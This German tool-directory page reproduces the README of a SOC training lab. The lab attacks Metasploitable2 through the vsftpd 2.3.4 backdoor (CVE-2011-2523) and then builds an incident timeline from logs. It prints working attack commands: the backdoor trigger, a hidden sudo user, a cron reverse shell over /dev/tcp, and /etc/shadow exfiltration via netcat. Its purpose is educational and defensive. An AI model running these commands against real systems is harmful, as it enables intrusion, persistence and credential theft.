Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
soc-investigation-lab — End-to-End-SOC-Untersuchung: Kill Chain für CVE-2011-2523, Korrelation von Logs aus mehreren Quellen, Vorfallbericht — MITRE ATT&CK T1190 | Kitploit
Tools/GitHubGitHub/mithileshan/soc-investigation-lab
AufklärungSchwachstellenanalyseExploitationForensikPost-ExploitationPenetrationstestsBedrohungsanalyseLernen & BildungIncident Response

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Log-Analyse
Labs & Praxis
GitHubmithileshan/soc-investigation-lab

soc-investigation-lab

End-to-End-SOC-Untersuchung: Kill Chain für CVE-2011-2523, Korrelation von Logs aus mehreren Quellen, Vorfallbericht — MITRE ATT&CK T1190

Repository anzeigen
15vor 5 MonatenNoch nicht geprüft
Teilen

End-to-End-SOC-Untersuchungslabor

Führt eine vollständige Angriffskette mit vier Phasen (Reconnaissance → Exploitation → Persistence → Exfiltration) gegen Metasploitable2 aus, sammelt in jeder Phase Beweismaterial und erstellt eine strukturierte Vorfall-Zeitleiste sowie einen SOC-Bericht – und demonstriert dabei gleichzeitig das Denken von Angreifer und Verteidiger.

MITRE ATT&CK T1190 MITRE ATT&CK T1136 MITRE ATT&CK T1078 MITRE ATT&CK T1041 Python


Zielsetzung

Dies ist das Abschlussprojekt. Es demonstriert die Fähigkeit:

  • Eine realistische Kill Chain gegen ein bewusst verwundbares Ziel auszuführen
  • In jeder Phase forensische Beweise aus mehreren Telemetriequellen zu sammeln
  • Logeinträge aus unterschiedlichen Systemen zu einer einheitlichen Vorfall-Zeitleiste zu korrelieren
  • Eine Analyse der Sichtbarkeitslücken durchzuführen – aufzudecken, was ohne angemessene Erkennungsabdeckung übersehen worden wäre
  • Einen SOC-tauglichen Vorfallbericht im Format echter Sicherheitsteams zu erstellen

Der verwendete Exploit (CVE-2011-2523 — vsftpd-2.3.4-Hintertür) ist historisch bedeutsam: Es handelte sich um einen Supply-Chain-Angriff, bei dem ein Angreifer eine Hintertür in das Quellcode-Repository des Open-Source-Pakets vsftpd einschleuste.


Architektur

                    ╔═══════════════════════════════╗
                    ║  soc-lab (172.23.0.0/24)       ║
                    ║                               ║
┌─────────────┐     ║  ┌─────────────────────────┐  ║
│  Attacker   │     ║  │  Metasploitable2        │  ║
│  Kali Linux │     ║  │  172.23.0.200           │  ║
│             │     ║  │                         │  ║
│  Phase 1    │─────╫─►│  :21  vsftpd 2.3.4 ◄───╫──╫── CVE-2011-2523
│  nmap -A    │     ║  │  :22  SSH               │  ║    backdoor on :6200
│             │     ║  │  :80  HTTP (DVWA)        │  ║
│  Phase 2    │─────╫─►│  :445 Samba             │  ║
│  msf exploit│◄────╫──│  :6200 root shell       │  ║
│             │     ║  └─────────────────────────┘  ║
│  Phase 3    │─────╫─► useradd sysbackup           ║
│  persistence│─────╫─► crontab reverse shell       ║
│             │     ║                               ║
│  Phase 4    │◄────╫── /etc/shadow via nc :5555    ║
│  exfiltration     ╚═══════════════════════════════╝
└──────┬──────┘
       │
       │ Evidence collection:
       │  logs/msf_session.log
       │  logs/target_auth.log
       │  captures/full_attack_chain.pcap (tshark CSV)
       ▼
┌──────────────────────────────────────────────────┐
│  build_timeline.py                               │
│  Parser: MSF log + auth.log + tshark CSV         │
│  → merge by timestamp → tag by phase             │
│  → JSON timeline + Markdown incident report      │
└──────────────────────────────────────────────────┘

Werkzeuge & Stack

ToolZweck
Metasploitable2Bewusst verwundbares Linux-Zielsystem
Nmap 7.94Phase 1: Dienste-Enumeration
Metasploit 6.xPhase 2: vsftpd-2.3.4-Exploit
NetcatPhase 3–4: Persistenz + Exfiltration
tsharkPaketerfassung über alle Phasen
Python 3build_timeline.py – Multi-Quellen-Log-Zusammenführung
Splunk Free / ELKPhasenspezifische SIEM-Erkennung

Einrichtung

cd docker/

# Start Metasploitable2 (isolated network)
docker compose up -d metasploitable

# Verify target is reachable
nmap -p 21,22,80 172.23.0.200

# Start background packet capture
sudo tcpdump -i eth0 host 172.23.0.200 \
    -w captures/full_attack_chain.pcap &

Durchführung (Angriffskette)

Phase 1 — Aufklärung

nmap -sV -O -A \
    -p 21,22,80,139,445,3306,5432 \
    --script=banner,ftp-anon,http-title \
    -oX logs/recon_scan.xml \
    172.23.0.200

Wichtigste Erkenntnis: 21/tcp open ftp vsftpd 2.3.4

Phase 2 — Exploitation (CVE-2011-2523)

# Method A: Metasploit
msfconsole -q -x "
  use exploit/unix/ftp/vsftpd_234_backdoor;
  set RHOSTS 172.23.0.200;
  set PAYLOAD cmd/unix/interact;
  run" | tee logs/msf_session.log

# Method B: Manual (demonstrates the mechanism)
# Step 1: Trigger backdoor by sending username with ':)'
printf "USER evil:)\r\nPASS x\r\n" | nc 172.23.0.200 21
# Step 2: Connect to spawned root shell
nc 172.23.0.200 6200
# → id: uid=0(root) gid=0(root)

Warum das funktioniert: Wenn vsftpd 2.3.4 einen Benutzernamen mit der Teilzeichenkette :) empfängt, führt der Daemon execl("/bin/sh",...) aus, das an TCP-Port 6200 gebunden ist. Keine Authentifizierung erforderlich – direkte Root-Shell.

Phase 3 — Persistenz

# Execute in the root shell on target:
useradd -m -s /bin/bash sysbackup
echo "sysbackup:$(openssl passwd -1 secr3t)" >> /etc/passwd
echo "sysbackup ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
(crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/172.23.0.1/9999 0>&1") | crontab -

Phase 4 — Exfiltration

# Receiver (attacker)
nc -lvnp 5555 > samples/exfiltrated_shadow.txt

# Sender (on target)
cat /etc/shadow | nc 172.23.0.1 5555

Erstellen der Vorfall-Zeitleiste

# Convert PCAP to CSV first
bash ../02-network-recon-detection/src/pcap_to_siem.sh captures/full_attack_chain.pcap

# Build timeline from all sources
python3 src/build_timeline.py \
    --msf-log  logs/msf_session.log \
    --auth-log logs/target_auth.log \
    --pcap-csv captures/full_attack_chain_packets.csv \
    --output-json samples/timeline.json \
    --output-md   docs/incident_report.md \
    --pretty

Beispielausgabe

build_timeline.py stderr

2026-04-24T16:05:20  [INFO    ]  Parsed 9 events from MSF log
2026-04-24T16:05:20  [INFO    ]  Parsed 11 events from auth.log
2026-04-24T16:05:20  [INFO    ]  Parsed 4 flow-initiation events from PCAP CSV
2026-04-24T16:05:20  [INFO    ]  Total events (sorted): 24
2026-04-24T16:05:20  [INFO    ]  Unique IOCs extracted: 4
2026-04-24T16:05:20  [INFO    ]  Phase RECON   : 8 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase EXPLOIT : 4 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase PERSIST : 6 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase EXFIL   : 2 event(s)

Vorfall-Zeitleiste (Auszug aus samples/sample_timeline.json)

{
  "total_events": 24,
  "iocs": [
    { "indicator": "172.23.0.1", "phase": "RECON",   "occurrence": 8 },
    { "indicator": "172.23.0.1", "phase": "EXPLOIT",  "occurrence": 2 },
    { "indicator": "sysbackup",  "phase": "PERSIST", "occurrence": 1 }
  ],
  "timeline": [
    { "timestamp": "2026-04-24T14:10:05+00:00", "phase": "RECON",   "description": "nmap -sV -O -A", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:22:41+00:00", "phase": "EXPLOIT", "description": "session 1 opened (172.23.0.1 → 172.23.0.200)", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:28:07+00:00", "phase": "PERSIST", "description": "useradd: new user: name=sysbackup", "source": "auth_log" },
    { "timestamp": "2026-04-24T14:35:52+00:00", "phase": "EXFIL",   "description": "flow 172.23.0.200 → 172.23.0.1:5555", "source": "pcap" }
  ]
}

Analyse der Sichtbarkeitslücken

Dies ist die wichtigste analytische Ausgabe – was ohne angemessene Erkennung übersehen worden wäre.

Tool herunterladen